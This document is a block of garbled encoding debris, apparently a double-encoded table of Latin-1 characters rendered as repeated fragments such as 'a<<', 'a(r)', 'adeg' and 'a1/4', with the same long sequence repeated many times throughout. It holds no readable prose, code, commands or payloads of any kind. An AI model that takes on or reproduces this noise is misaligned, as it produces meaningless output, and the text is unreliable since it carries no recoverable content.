a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3a'auaPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)oa(r)>>a(r)1/4a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a- a-!a-C/a-PSa-$?a-Y=a-|a-SSa-"a-(c)a-aa-<<a-!a-a-(r)a--a-dega-+-a-2a-3a-'a-ua-Pa-*a-,a-1a-oa->>a-1/4a-1/2a-3/4a-?adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)aa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 